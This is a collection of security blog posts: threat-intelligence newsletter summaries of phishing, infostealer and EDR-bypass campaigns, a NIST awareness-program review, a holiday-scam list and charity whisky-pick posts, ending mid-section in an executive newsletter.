Phishing Tactic: Emails posing as copyright infringement notices.

Malware Delivery: Malicious files masquerading as PDFs that contain infostealers.

Further Reading: Cisco Talos Report on Copyright Infringement Phishing Lure

Beware of 'Phish 'n' Ships': Fake Online Stores Stealing Your Money and Data

Cybercriminals are increasingly creating fraudulent online shops that mimic legitimate retailers to deceive consumers into providing payment information and personal data. These fake websites often offer enticing deals on popular products, luring unsuspecting shoppers into making purchases. Once payment details are entered, the scammers steal the information, leading to financial loss and potential identity theft.

How to Protect Yourself:

Verify Website Authenticity: Before making a purchase, ensure the website is legitimate by checking the URL for misspellings or unusual domain extensions.

Look for Secure Connections: Ensure the website uses HTTPS, indicating a secure connection.

Research the Seller: Look for reviews and ratings from other customers to confirm the retailer's credibility.

Be Cautious of Unrealistic Deals: If an offer seems too good to be true, it likely is.

Further Reading: Human Security

Beware of DocuSign-Inspired Invoice Scams

Cybercriminals are leveraging DocuSign’s Envelopes API to distribute highly realistic fake invoices impersonating trusted brands like Norton and PayPal. These malicious emails come from legitimate DocuSign domains, bypassing security filters and appearing authentic. Attackers aim to have recipients e-sign the document, which can authorize unauthorized payments.

What You Can Do:

Always verify invoice details directly with the company rather than clicking links within emails.

Look out for unexpected requests, even from trusted services.

Educate your team about this tactic and report suspicious invoices immediately.

Further Reading: Bleeping Computer

Mobile Ad Data Enables Widespread Surveillance

Recent investigations reveal that commercial services are exploiting mobile advertising data to track individuals' daily movements without their consent. By collecting data from widely-used mobile apps and websites, these services can monitor personal locations, posing significant privacy risks.

Protect Your Privacy:

Limit App Permissions: Only grant apps the permissions they genuinely need.

Review Privacy Settings: Regularly check and adjust your device's privacy settings to control data sharing.

Stay Informed: Be aware of how your data is collected and used by the apps and services you utilize.

Further Reading: Krebs on Security

Phishing Scams Targeting Booking.com Users

Recent reports highlight a surge in phishing attacks exploiting Booking.com accounts. Cybercriminals are compromising hotel partner accounts to access customer booking details, subsequently sending fraudulent messages that appear legitimate. These messages often request additional information or payments, aiming to deceive users into providing sensitive data or transferring funds.

Protect Yourself:

Verify Communications: Always confirm the authenticity of messages by contacting the hotel or Booking.com directly through official channels.

Avoid Unsolicited Links: Do not click on links or download attachments from unexpected emails or messages.

Enable Two-Factor Authentication (2FA): Activate 2FA on your Booking.com account to add an extra layer of security.

Further Reading: Krebs on Security

North Korean IT Workers Infiltrating Western Companies

Recent investigations have uncovered a concerning trend: North Korean IT professionals are securing remote positions in Western companies, including those in the United States, by using stolen identities and sophisticated social engineering tactics. This strategy enables them to bypass international sanctions and funnel earnings back to North Korea, potentially funding illicit activities.

Key Insights:

Identity Theft: These individuals often use stolen or fabricated identities to pose as qualified candidates from various countries.

Advanced Techniques: They employ generative AI tools to craft convincing resumes and perform well in interviews, making detection challenging.

Financial Implications: Earnings from these positions are redirected to support North Korea's sanctioned programs, including its weapons development initiatives.

Further Reading: Zscaler Security Research

Surge in Eventbrite-Based Phishing Attacks

Recent analyses by Perception Point have identified a significant increase in phishing campaigns exploiting Eventbrite's scheduling platform. Between July and October 2024, these attacks escalated by 900%, with cybercriminals sending deceptive emails from 'noreply[@]events[.]eventbrite[.]com' to distribute malicious content.

Key Insights:

Legitimate Appearance: Utilizing Eventbrite's legitimate email domain allows attackers to bypass standard security filters, making the phishing emails appear authentic to recipients.

Malicious Payloads: The emails often contain links or attachments designed to harvest credentials or deploy malware upon interaction.

Targeted Entities: While the attacks are widespread, they predominantly focus on organizations that frequently use event management platforms, increasing the likelihood of successful exploitation.

Further Reading: KnowBe4 Blog

Phishing Campaign Impersonates OpenAI to Steal Financial Information

Cybercriminals are currently conducting a phishing campaign that impersonates OpenAI to deceive users into providing their financial details. The fraudulent emails inform recipients that their ChatGPT subscription payment has been declined, prompting them to click a link to update their payment method.

Key Insights:

Deceptive Tactics: The emails are designed to appear legitimate, leveraging OpenAI's branding to gain user trust.

Malicious Links: Clicking the provided link directs users to a fake payment page intended to capture sensitive financial information.

Widespread Targeting: This campaign is part of a broader trend where attackers exploit the popularity of AI tools to launch phishing attacks.

Further Reading: KnowBe4 Blog

Corrupted Word Documents in Novel Phishing Campaign

A newly identified phishing campaign exploits Microsoft's Word file recovery feature by using intentionally corrupted Word documents as email attachments. These documents evade detection by security solutions due to their damaged state, but Word can still recover and open them.

Key Insights:

The Lure: Emails impersonate payroll and HR departments, with themes like employee bonuses and benefits. The attachments appear as corrupted files but can be repaired by Word.

Malicious QR Codes: Upon recovery, the documents prompt users to scan a QR code branded with company logos. Scanning leads to phishing sites designed to steal Microsoft login credentials.

Detection Challenges: Most attachments used in this campaign avoid detection on platforms like VirusTotal, as they contain no active malicious code, just deceptive QR codes.

Attack Effectiveness: By exploiting overlooked document recovery mechanisms, this method bypasses traditional email security filters, increasing the likelihood of reaching victims.

Further Reading: BleepingComputer Article

Cybercriminals Exploit Search Engine Results to Promote Phishing Pages

Cybercriminals are increasingly employing search engine poisoning to elevate malicious phishing sites in search results, deceiving users into divulging sensitive information. Researchers at Malwarebytes discovered that a search for "KeyBank login" on Bing displayed a counterfeit KeyBank login page above the official site.

Key Insights:

Manipulated Search Results: Attackers optimize malicious sites to appear prominently in search results, making them seem legitimate and increasing the likelihood of user interaction.

Phishing Tactics: These fraudulent pages mimic authentic login portals, aiming to harvest users' credentials and personal data.

Broader Implications: This tactic, known as SEO poisoning, extends beyond banking sites, potentially affecting various sectors and services.

Further Reading: KnowBe4 Blog

Attackers Exploit Corrupted Files to Evade Detection

Cybersecurity researchers have identified a novel phishing campaign that utilizes intentionally corrupted Microsoft Office documents and ZIP archives to bypass email security measures. These corrupted files evade antivirus scans and email filters, yet can be opened by users through built-in recovery features in applications like Microsoft Word and WinRAR.

Key Insights:

Evasion Techniques: The corrupted state of these attachments prevents security tools from properly scanning them, allowing malicious emails to reach users' inboxes undetected.

User Interaction: When users attempt to open these corrupted files, applications prompt them to recover the content, leading to the display of malicious elements such as QR codes.

Malicious Outcomes: Scanning the embedded QR codes can redirect users to phishing websites designed to steal credentials or deploy malware.

This tactic highlights the continuous evolution of phishing strategies aimed at circumventing security defenses and exploiting user trust in application recovery features.

Further Reading: The Hacker News

December 2024 - Threat Intelligence Newsletter

December 5, 2024

This is a monthly newsletter that I share internally with our Cybersecurity team. Feel free to take and use for your own team. Created with the help of ChatGPT.

Google’s New SAIF Risk Assessment Tool for AI Security

Google has introduced the Secure AI Framework (SAIF) Risk Assessment tool to help organizations proactively identify and mitigate security risks in their AI systems. This interactive tool assesses key areas such as training data integrity, access controls, and defenses against adversarial inputs. Upon completion, organizations receive a tailored report outlining specific vulnerabilities and recommended mitigation strategies, reinforcing the need for robust security measures as AI systems become more prevalent.

Further Reading: Google Blog on SAIF Risk Assessment

Session Cookie Theft Bypasses MFA Protections

The FBI has issued a warning about cybercriminals exploiting stolen session cookies to hijack email accounts, effectively bypassing Multi-Factor Authentication (MFA) safeguards. These "Remember-Me" cookies, typically valid for 30 days, store session IDs that authenticate users without repeated logins. If intercepted, attackers can impersonate users, gaining unauthorized access to email accounts and sensitive information.

Mitigation Strategies:

Monitor Account Activity: Stay vigilant for unfamiliar login attempts or unauthorized changes.

Implement Robust Security Measures: Utilize endpoint protection solutions to detect and prevent malware that could steal session cookies.

Further Reading: Malwarebytes

Sophos Reports Sophisticated China-Based Threats Targeting Network Perimeters

Sophos recently uncovered a five-year cyber espionage campaign by China-based groups, including APT31 and APT41, that targeted network edge devices like firewalls. These attackers used zero-day vulnerabilities and custom malware to infiltrate and persist within critical infrastructure across the Indo-Pacific region, including energy suppliers, government agencies, and telecommunications. Advanced tactics include stealth operations, sabotaging firewall telemetry, and deploying an early version of a UEFI bootkit on firewall devices.

Key Insights:

Critical Infrastructure Targeting: Attackers focused on high-value assets, compromising essential services.

Advanced Persistence Tactics: Use of rootkits and stealth malware for long-term access.

Importance of Edge Device Security: Firewalls and perimeter defenses remain primary entry points for these threats.

Further Reading: Sophos News

Preparing for Emerging AI Risks

The latest Unit 42 Threat Frontier report highlights the evolving risks associated with generative AI (GenAI) in cybersecurity. As threat actors increasingly explore AI tools to enhance attack methods, traditional defenses like Zero Trust architectures remain essential, but additional AI-focused defenses are becoming critical. The report also emphasizes the growing issue of "Shadow AI," or the unauthorized use of AI tools within organizations, which poses unique security challenges.

Key Insights:

Shadow AI Risk: Unauthorized use of AI tools within organizations increases security vulnerabilities.

AI-Specific Defenses: Integrating AI-focused security measures early in development is essential for robust protection.

Continued Importance of Traditional Defenses: Zero Trust and other established architectures are still effective but need AI-specific adaptations.

Further Reading: Unit 42 - Palo Alto Networks

Extortion Actor's EDR Bypass Attempt Unveiled

Unit 42 recently investigated an extortion incident where threat actors attempted to bypass Endpoint Detection and Response (EDR) systems using a tool named "disabler.exe." This tool, derived from the publicly available EDRSandBlast, aimed to unhook EDR hooks in both user-mode libraries and kernel-mode, facilitating unauthorized access. The attackers utilized rogue systems with outdated Cortex XDR agents to test their methods, inadvertently exposing their toolkit and operations. This exposure allowed Unit 42 to trace the tool's sale on cybercrime forums and identify one of the threat actors involved.

Unit 42

Key Insights:

Advanced Evasion Techniques: Attackers are employing sophisticated tools to disable security mechanisms, highlighting the need for robust and up-to-date EDR solutions.

Operational Exposure: Testing malicious tools in uncontrolled environments can inadvertently reveal threat actor methodologies and identities.

Community Vigilance: Monitoring cybercrime forums and sharing intelligence are crucial for preempting and mitigating such threats.

Further Reading: Unit 42 - Palo Alto Networks

Surge in Fake Emergency Data Requests

The FBI has issued a warning to U.S. organizations about a rise in fraudulent emergency data requests (EDRs) by cybercriminals. These malicious actors compromise government email accounts to impersonate law enforcement, exploiting the urgency of EDRs to obtain sensitive user information from service providers without legal oversight.

Key Insights:

Tactics: Cybercriminals gain access to official email accounts, enabling them to submit convincing EDRs to companies, thereby bypassing standard legal procedures.

Motivations: The harvested data is often used for further criminal activities, including identity theft, financial fraud, and targeted cyberattacks.

Indicators of Compromise: Unusual or unexpected data requests, especially those marked as urgent, should be scrutinized for authenticity.

Recommendations:

Verification Protocols: Implement strict verification processes for all data requests, including direct confirmation with the requesting agency through known contact points.

Employee Training: Educate staff on the prevalence of fake EDRs and establish clear procedures for handling such requests.

Monitoring and Reporting: Continuously monitor for suspicious data requests and report any fraudulent attempts to the appropriate authorities.

Staying vigilant against these deceptive tactics is crucial to safeguarding sensitive information and maintaining trust with users.

Further Reading: SecurityWeek

The Credential Abuse Cycle

Recent analyses have highlighted the escalating threat of credential abuse, where cybercriminals exploit stolen usernames and passwords to infiltrate networks and access sensitive data. This cycle comprises three key stages: theft, trade, and exploitation.

Key Insights:

Credential Theft: Attackers acquire credentials through data breaches, malware (notably infostealers), and social engineering.

Underground Trading: Stolen credentials are sold on cybercriminal forums, specialized marketplaces, and messaging platforms like Telegram.

Exploitation: With these credentials, threat actors conduct account takeovers, credential stuffing, and valid account abuse, leading to data breaches and financial losses.

Further Reading: ReliaQuest Blog

Rise in SVG-Based Phishing Attacks

Cybercriminals are increasingly utilizing Scalable Vector Graphics (SVG) files in phishing emails to bypass security filters and deliver malicious content. Unlike traditional image formats, SVG files can contain embedded scripts, allowing attackers to execute malicious code when the file is opened.

Key Insights:

Evasion Techniques: SVG files are often overlooked by email security systems, enabling malicious payloads to reach recipients undetected.

Embedded Malware: Attackers embed JavaScript within SVG files to initiate redirects to phishing sites or to download malware onto the victim's device.

Increased Prevalence: There is a notable uptick in phishing campaigns leveraging SVG attachments, highlighting the need for heightened vigilance.

Further Reading: Bleeping Computer

2024 CWE Top 25 Most Dangerous Software Weaknesses Released

The Common Weakness Enumeration (CWE) has published its 2024 list of the Top 25 Most Dangerous Software Weaknesses. This annual compilation identifies the most prevalent and critical vulnerabilities that can lead to severe security breaches, including system takeovers, data theft, and application disruptions.

Key Highlights:

Top Vulnerabilities: The list features critical weaknesses such as Cross-Site Scripting (CWE-79), Out-of-Bounds Write (CWE-787), and SQL Injection (CWE-89).

Data Insights: The 2024 list is based on an analysis of 31,770 CVE Records, providing a comprehensive overview of current software security challenges.

Resource for Mitigation: The CWE Top 25 serves as a valuable resource for developers and security professionals to prioritize mitigation efforts and enhance software security practices.

Further Reading: CWE Top 25 Most Dangerous Software Weaknesses

Analysis of CISA's 2023 Top Exploited Vulnerabilities

The Cybersecurity and Infrastructure Security Agency (CISA) has released its 2023 report on the most routinely exploited vulnerabilities, providing critical insights into the threat landscape. An in-depth analysis by VulnCheck offers additional perspectives on these vulnerabilities, emphasizing their exploitation patterns and associated threat actors.

Key Insights:

Exploit Availability: Out of the 15 vulnerabilities highlighted, 14 have eight or more publicly available proof-of-concept (POC) exploits, indicating a high risk of exploitation.

Weaponized Exploits: Thirteen vulnerabilities have weaponized exploits, with five being weaponized before any public evidence of exploitation emerged.

Threat Actor Activity: Sixty named threat actors are linked to 13 of these vulnerabilities. Notably, North Korea's Silent Chollima group targeted nine of the listed vulnerabilities.

Detection Coverage: VulnCheck provides Initial Access artifacts for 12 of the 15 vulnerabilities, aiding defenders in identifying and mitigating potential threats.

Further Reading: VulnCheck Blog

Surge in Eventbrite-Based Phishing Attacks

Key Insights:

Legitimate Appearance: Utilizing Eventbrite's legitimate email domain allows attackers to bypass standard security filters, making the phishing emails appear authentic to recipients.

Malicious Payloads: The emails often contain links or attachments designed to harvest credentials or deploy malware upon interaction.

Targeted Entities: While the attacks are widespread, they predominantly focus on organizations that frequently use event management platforms, increasing the likelihood of successful exploitation.

Further Reading: KnowBe4 Blog

Large-Scale Phishing Campaign Deploys Rhadamanthys Stealer v0.7

Check Point Research has identified a significant phishing operation utilizing the latest version of the Rhadamanthys Stealer, known as Rhadamanthys.07. This campaign, dubbed "CopyRh(ight)adamantys," impersonates legitimate companies to distribute malware under the guise of copyright infringement notices.

Checkpoint Blog

Key Insights:

Phishing Tactics: Attackers send emails from Gmail accounts, alleging copyright violations on the recipient's social media pages, prompting them to download a file that initiates the malware infection.

Global Reach: The campaign targets individuals and organizations across multiple continents, with approximately 70% of impersonated companies belonging to the entertainment, media, technology, and software sectors.

Malware Capabilities: Rhadamanthys.07 includes features such as AI-powered optical character recognition (OCR) modules, enhancing its ability to extract data from infected machines.

Further Reading: Check Point Blog

Corrupted Word Documents in Novel Phishing Campaign

Key Insights:

The Lure: Emails impersonate payroll and HR departments, with themes like employee bonuses and benefits. The attachments appear as corrupted files but can be repaired by Word.

Malicious QR Codes: Upon recovery, the documents prompt users to scan a QR code branded with company logos. Scanning leads to phishing sites designed to steal Microsoft login credentials.

Detection Challenges: Most attachments used in this campaign avoid detection on platforms like VirusTotal, as they contain no active malicious code, just deceptive QR codes.

Attack Effectiveness: By exploiting overlooked document recovery mechanisms, this method bypasses traditional email security filters, increasing the likelihood of reaching victims.

Further Reading: BleepingComputer Article

Surge in Infostealer Malware Exploiting Innovative Attack Vectors

In October 2024, Check Point Research identified a significant increase in infostealer malware activity, with cybercriminals employing advanced tactics to infiltrate systems and exfiltrate sensitive data.

Key Insights:

Prevalent Malware Families: The top threats included FakeUpdates, impacting 6% of organizations worldwide, followed by Androxgh0st at 5%, and AgentTesla at 4%.

Innovative Attack Vectors: Threat actors are leveraging sophisticated methods, such as malicious advertisements in search results—a tactic known as "malvertising"—to distribute infostealers. This approach enhances the legitimacy of malicious links, increasing the likelihood of user engagement.

Global Impact: The widespread distribution of these malware families underscores the necessity for organizations to adopt proactive and adaptive security measures to counter evolving cyber threats.

Further Reading: Check Point Blog

Attackers Exploit Corrupted Files to Evade Detection

Key Insights:

Evasion Techniques: The corrupted state of these attachments prevents security tools from properly scanning them, allowing malicious emails to reach users' inboxes undetected.

User Interaction: When users attempt to open these corrupted files, applications prompt them to recover the content, leading to the display of malicious elements such as QR codes.

Malicious Outcomes: Scanning the embedded QR codes can redirect users to phishing websites designed to steal credentials or deploy malware.

This tactic highlights the continuous evolution of phishing strategies aimed at circumventing security defenses and exploiting user trust in application recovery features.

Further Reading: The Hacker News

Key Takeaways from NIST SP 800-50r1 – Building a Cybersecurity and Privacy Learning Program

December 2, 2024

In September 2024, the National Institute of Standards and Technology (NIST) released the updated Special Publication (SP) 800-50r1, "Building a Cybersecurity and Privacy Learning Program." This is an update to the 2003 NIST Special Publication (SP) 800-50, Building an Information Technology Security Awareness and Training Program. I hadn’t realized that there was a NIST publication on building a security awareness program. It’s good to see an update after 21 years! Here's a look at the key insights and recommendations from the updated publication. This was written with the help of ChatGPT.

Understanding THE Cybersecurity and Privacy Learning Program (CPLP)

Name Change! The document introduces the Cybersecurity and Privacy Learning Program (CPLP) as an overarching framework that includes awareness campaigns, role-based training, and workforce education initiatives. Aimed at fostering a culture of security and privacy, the CPLP is a strategic effort to manage risks and comply with federal regulations, such as FISMA. With privacy becoming a much bigger topic in the last 10 years, rolling it into an cybersecurity awareness program makes sense. This could cross multiple teams depending on how an organization is setup.

CPLP emphasizes awareness and education, incorporating role-specific training alongside general awareness activities, and focuses on encouraging behavior change to reduce risks and foster a culture of security. Continuous improvement is integral, with metrics and evaluations used to adapt programs to evolving needs.

The CPLP Life Cycle

NIST defines a four-phase life cycle for managing CPLPs: Plan and Strategy; Analysis and Design; Development and Implementation; and Assessment and Improvement. These phases involve developing a strategic vision that aligns learning objectives with organizational goals, identifying learning needs and creating tailored program designs, building or procuring learning materials and deploying the program, and measuring effectiveness while refining strategies based on outcomes. This iterative approach ensures that the CPLP remains dynamic and aligned with organizational needs.

Leadership and Organizational Roles

The success of a CPLP hinges on active involvement across all levels of the organization. Senior leadership plays a crucial role in providing strategic direction and resources, while CPLP managers oversee program design, delivery, and metrics. System users, on the other hand, are responsible for adhering to policies and participating in required training. Leadership participation, such as senior leaders engaging in training themselves, reinforces the importance of the program. Leadership buy-in is the first step to getting any sort of program off the ground. Heavily regulated industries are easier to get buy-in for than others.

Metrics and Measurements

Effective CPLPs rely on a mix of quantitative and qualitative metrics to evaluate success. Quantitative metrics include training completion rates, reductions in incidents, and compliance statistics, while qualitative metrics involve employee feedback, focus group discussions, and behavioral observations. NIST emphasizes using these metrics not just for compliance but to drive meaningful behavior change and demonstrate return on investment.

This section was helpful for thinking about what sort of metrics to have. One of the examples brought up is click rate which is a highly volatile statistic. A better statistic is report rate which is a positive behavior an organization wants to encourage within their population. The document doesn’t define what an organization should have for metrics but instead provides guidance.

Integrating Privacy into Cybersecurity Training

One of the standout updates in SP 800-50r1 is the seamless integration of privacy training into cybersecurity programs. It highlights the interconnected nature of these disciplines and the need for training to address both cybersecurity incidents and privacy risks, such as data re-identification or misuse. Teaching employees about privacy risks enables them to recognize potential problems and implement procedures that minimize such risks.

This is big within healthcare. Reports like the Verizon Data Breach Investigation Report show that the healthcare industry has higher internal threat actors due to mistakes and errors with handling information. This can lead to huge privacy implications for the organization.

Tailored Training for Diverse Audiences

CPLPs should be segmented to address specific needs. General users benefit from training on fundamental security practices, such as phishing awareness, while privileged access holders require advanced training on managing sensitive systems. Those in specialized roles undergo deeper training specific to their risks and responsibilities. Tailoring training ensures that it remains relevant and impactful for all user groups.

Easy to suggest much harder to do. A good starting point is what’s mentioned in the publication: all users; privileged access account holders; new employees; and staff with cybersecurity and privacy responsibilities. Tailored training should be broken down further into departments such as service desk and finance but this is a good starting point.

Focusing on Improvement Without Punishment

One of the critical takeaways from NIST SP 800-50r1 is the emphasis on using cybersecurity exercises, such as phishing tests, as opportunities for learning and improvement rather than punishment. The publication highlights the importance of informing employees that these exercises are conducted randomly and that the results will guide future learning activities. Such exercises should not be punitive, nor should employees be singled out for their responses. By framing these activities as learning opportunities, organizations can gather valuable data on vulnerabilities while fostering a supportive environment that encourages employee growth and engagement with cybersecurity practices.

A Culture of Learning

At its core, SP 800-50r1 promotes a culture of continuous learning and adaptation. From onboarding new employees to advanced training for cybersecurity professionals, the document underscores the importance of embedding cybersecurity and privacy awareness into organizational DNA. By viewing cybersecurity and privacy learning as an evolving process, organizations can be prepared for emerging risks and technologies.

Conclusion

NIST SP 800-50r1 offers a robust roadmap for organizations looking to strengthen their cybersecurity and privacy posture. For organizations aiming to enhance their cybersecurity and privacy programs, reading SP 800-50r1 is a great starting point. A focus on building culture and rewarding people will help change behavior and reduce the human element in incidents.

Explore the full NIST SP 800-50r1 publication here.

The 12 Scams of The Holiday Seasons: How to Stay Safe This Holiday Season

November 26, 2024

I wrote this for a security awareness program with help from ChatGPT. Feel free to grab and share within your own organizations.

The Better Business Bureau (BBB) has long been a trusted resource for protecting consumers and promoting trustworthy business practices. Their mission to provide valuable insights and tools to stay vigilant against fraud is especially critical during the holidays. This year, the BBB has compiled a list of the "12 Scams of Christmas" to help ensure your festive season remains joyful and scam-free.

Here’s a quick overview of these scams and how to protect yourself:

Fake Social Media Ads: Beware of deals that are too good to be true—they may lead to counterfeit or undelivered goods.
Gift Exchange Scams: Pyramid schemes disguised as “fun” gift exchanges often harvest personal information.
Holiday Apps: Some seemingly festive apps collect data or install malware on your device.
Fake Toll Texts: Scammers target holiday travelers with bogus unpaid toll notifications.
“Free” Gift Cards: Phishing emails offering gift cards often aim to steal sensitive data.
Seasonal Job Scams: Fake job listings trick job seekers into providing personal or financial details.
Impostor Scams: Fraudsters pose as customer service reps or mimic legitimate websites.
Fake Charities: Scammers take advantage of the season’s generosity with fraudulent donation appeals.
Phishing Shipping Notifications: Fake alerts about undelivered packages are phishing attempts.
Advent Calendar Scams: Low-quality or nonexistent calendars sold by untrustworthy vendors.
Shady Pop-Up Shops: Temporary retailers that vanish with your money or sell counterfeit goods.
Too-Good-To-Be-True Travel Deals: Unrealistically low offers designed to scam travelers.

How to Stay Safe:

Be skeptical of deals that sound too good to be true.
Verify sellers, charities, and offers through trusted sources.
Avoid clicking on unsolicited links or emails.

The BBB offers a wealth of information to help you navigate the holiday season safely. For the full list of scams and detailed safety tips, visit their 12 Scams of Christmas page.

This holiday season let’s protect our wallets and our personal information while spreading cheer and generosity. A little awareness can go a long way in keeping the holidays merry and bright!

Whiskey with a Cause: An Inside Look at ILF’s Barrel Pick Adventure

November 14, 2024

The auction for some fabulous whisky is live at Unicorn Auctions until November 21, 2024. Proceeds go to the Innocent Lives Foundation.

You can view the live recording at the ExploreSec YouTube Channel. The audio version of the podcast will hit the podcast feed soon.

At Exploring Information Security, we’re passionate about all things cybersecurity, community, and—every now and then—a great bourbon adventure. In April 2024, I had the chance to join a unique charity experience: a barrel pick trip with the Innocent Lives Foundation (ILF). It was a memorable journey that not only deepened my appreciation for bourbon but also highlighted how a shared passion can turn into a powerful force for good.

The Origins of the ILF Barrel Pick Club

The ILF Barrel Pick Club started with a simple idea: what if they could combine a love for whiskey with a mission to protect children? A few conversations later, this idea grew into a fully-fledged project, allowing whiskey enthusiasts to purchase exclusive barrels with all proceeds supporting ILF’s mission of identifying predators and protecting children. The club's purpose is to create a community where each sip makes a difference. However, getting to that first barrel wasn’t straightforward; with whiskey’s growing popularity, acquiring a quality barrel often requires invites, lotteries, and long waitlists.

An Exclusive Tour of Legendary Distilleries

Our journey led us to Louisville, Kentucky, where we visited some of the country’s most iconic distilleries, including Four Roses and the lesser-known gem Starlight Distillery. These aren’t just whiskey manufacturers—they are stewards of tradition, science, and innovation, each offering distinct qualities that make them unique.

At Four Roses, we were taken behind the scenes and introduced to their precise process, from single-story rickhouses to unique yeast strains. We learned that each barrel tells a story; the location, temperature, and aging process impart distinct flavors and profiles. Four Roses, renowned for its transparent labeling, even indicates barrel location details down to the warehouse tier and barrel direction.

Across the river, we discovered Starlight Distillery, a family-owned operation with a 200-year history in farming and a more recent venture into bourbon-making. Known for experimenting with unique finishes like Mizunara oak (a notoriously tricky Japanese wood), Starlight introduced us to a whole new world of flavors and finishes. It’s a place as much for bourbon as for families, complete with a fun park and farm tours.

Crafting the Perfect Barrel Pick

Picking a barrel is a blend of art and science—and more challenging than one might expect. With guidance from our hosts, we tasted everything from rich caramel to floral and smoky notes. A well-rounded tasting experience involves layers of flavor and aroma that evolve with each sip. This nuanced approach is essential when selecting barrels for auction because our picks aren’t just about finding what tastes good—they have to resonate with the community of experienced drinkers while supporting ILF’s mission.

At each stop, we were welcomed with enthusiasm, kindness, and yes, lots of whiskey. Starlight even donated a bottle of their premium Mizunara cask-aged bourbon to support the ILF auction. The generosity of these distilleries reflects their alignment with ILF’s purpose. It was humbling to see how eager they were to support a mission that matters deeply to us.

Bidding on a Purpose: The ILF Whiskey Auction

The highlight of this journey is the ILF auction, hosted by Unicorn Auctions. Unicorn Auctions has gone above and beyond to support us by waiving all fees, ensuring that every dollar raised goes to ILF’s mission. The auction features exclusive bottles selected during our barrel pick trip, and each bottle represents a unique expression of craftsmanship and generosity.

These bottles aren’t just collectibles; they’re tokens of the ILF mission. Whether you’re an experienced bourbon enthusiast or a newcomer, bidding in the auction allows you to support ILF in a unique way. Proceeds from the auction directly fund ILF’s work in identifying and helping bring child predators to justice, one bottle at a time.

Memorable Moments and Tasting Notes

The trip was full of memorable (and hilarious) moments—like trying to keep our stomachs steady on bumpy Kentucky roads after too many tastings or debating flavor notes (shoutout to Chris for the “pine sol” descriptor!). The tasting process highlighted just how subjective and personal whiskey can be. The complexities of flavor brought out some spirited debates and even a few new friendships.

One of the favorites of the group was the Starlight Double Oak—a rich, complex bourbon with dark spice and caramel notes that had us all captivated. If you’re lucky enough to get your hands on a bottle, it’s worth savoring every sip. For those looking for a unique twist, the Starlight honey finish adds a hint of natural sweetness that’s both unusual and surprisingly smooth.

Raising a Glass to a Cause

At the end of the day, these bottles represent something bigger. Each auction, each barrel, and each sip brings us closer to funding ILF’s crucial work. As we continue to grow the Barrel Pick Club, we’re reminded of the power of community, generosity, and shared passion. This journey has shown us that even something as simple as whiskey can make a profound difference.

If you’re interested in supporting ILF or exploring our latest auction, visit Unicorn Auctions and place a bid. Let’s raise a glass to great bourbon, and an even greater cause.

Created with the help of ChatGPT; edited by Timothy De Block. This post original posted on exploresec.com.

Join Us on a Barrel-Picking Adventure with the Innocent Lives Foundation!

November 12, 2024

This week, Exploring Information Security is excited to bring you a unique live recording that steps outside the digital world and into the heart of Kentucky and Indiana distilleries. We’re partnering with the Innocent Lives Foundation (ILF) for a special episode, where we dive into the art and experience of barrel picking. Our adventure took us to two iconic locations—Four Roses and Starlight Distillery—where we set out to find exceptional barrels and create a meaningful connection between the worlds of whiskey and cyber awareness.

Why a Barrel-Picking Adventure?

While cybersecurity and barrel picking might seem worlds apart, this journey is about more than just tasting whiskey. It’s about discovering the unique stories, craftsmanship, and community that make each barrel something special. For this live recording, we’re blending our curiosity for great whiskey with our commitment to the Innocent Lives Foundation’s important mission: protecting children from online exploitation.

Our Trip to Four Roses and Starlight Distillery

Our barrel-picking journey began at Four Roses, known for its distinctive, rich flavor profiles, and continued to Starlight Distillery, where each barrel tells its own story. At each stop, we dove into the meticulous process of selecting barrels, learning how master distillers and their teams create diverse flavors and memorable experiences.

Each barrel pick wasn’t just about taste—it was a sensory experience that engaged sight, smell, and sound. We discovered how small variations in wood, weather, and aging environments can shape a barrel's character and flavor. Selecting a barrel that stood out from the rest required both intuition and collaboration—a bit like finding the right approach to solving cybersecurity challenges.

Behind the Scenes: The Art of Barrel Picking

So, how does one go about picking a barrel? It starts with identifying what makes each barrel unique. From the moment we began the tasting process, we immersed ourselves in a symphony of aromas, textures, and flavors that define each barrel’s character. Some barrels surprised us with unexpected hints of fruit or spice, while others stood out for their smooth, rich finish. These discoveries weren’t just thrilling—they were a reminder of the craftsmanship and care that goes into every bottle.

Memorable Moments and Incredible People

One of the highlights of this journey was meeting the people behind the barrels. We heard stories from master distillers, learned about family traditions that have been passed down for generations, and saw firsthand the dedication it takes to produce high-quality spirits. These connections deepened our appreciation for the process and made each tasting session more meaningful.

Connecting the Dots: How This Adventure Supports ILF’s Mission

While we tasted and shared stories, we kept the Innocent Lives Foundation’s mission at the heart of this journey. ILF is dedicated to protecting children from online predators by working behind the scenes to identify and support law enforcement in bringing these offenders to justice. Each barrel we picked represents a small way to support ILF’s efforts, as proceeds from the sales will go directly to support their work.

For us, this experience was about more than the whiskey—it was about using this adventure to make a difference.

If you’d like to grab your own bottle head over to Unicorn Auctions!

Join Us Live!

Ready to dive into the world of barrel picking with us? Whether you’re a whiskey enthusiast, a cybersecurity pro, or a supporter of ILF’s mission, this episode promises to be packed with flavor, storytelling, and purpose.

🗓️ Tune in live around 6:30 PM ET on the ExploreSec YouTube channel: ExploreSec YouTube Channel. Join us for an unforgettable experience and discover the story behind each barrel we selected!

November 2024 Executive Leadership Cybersecurity Newsletter

November 12, 2024

This is a monthly newsletter I put together for our executive team with a lean towards healthcare. Created with help from ChatGPT.

Ransomware Threats Surge Globally in 2023

Summary: The 2023 Global Ransomware Incident Map highlights a 73% rise in ransomware attacks, targeting sectors like healthcare and finance. Cybercriminals are increasingly using "big game hunting" tactics, exploiting vulnerabilities such as the MOVEit flaw. This trend underscores the urgent need for businesses to bolster cybersecurity defenses and improve incident response strategies.

Further reading: Institute for Security and Technology.

AI Risks in the Workplace

A recent study by CybSafe revealed that 38% of workers are sharing sensitive information with AI tools, often without their employer's knowledge. This raises significant security concerns, especially since over half of employees have not received training on safe AI use. With the growing reliance on AI, it's crucial for executives to implement clear guidelines and provide training on secure AI practices to mitigate the risk of data breaches and protect intellectual property.

Further reading: CybSafe - AI Security Risks.

North Korean IT Worker Incident Highlights Hiring Risks

A recent cyberattack on a company underscores the dangers of unknowingly hiring North Korean operatives. The organization accidentally hired a North Korean IT worker who accessed sensitive data and demanded a ransom. This highlights the need for stringent vetting in remote hiring practices, especially as North Korea increasingly infiltrates global companies.

Recommended Protections:

Implement strict identity verification for remote workers.

Conduct thorough background checks with global databases.

Regularly monitor employee network activity for unusual behavior.

Further reading: GBHackers - North Korean IT Worker Incident.

Healthcare Supply Chain Attacks on the Rise

A recent Proofpoint report reveals that 68% of healthcare workers have faced a supply chain cyberattack, with 82% of these incidents affecting patient care.

Key Insights:

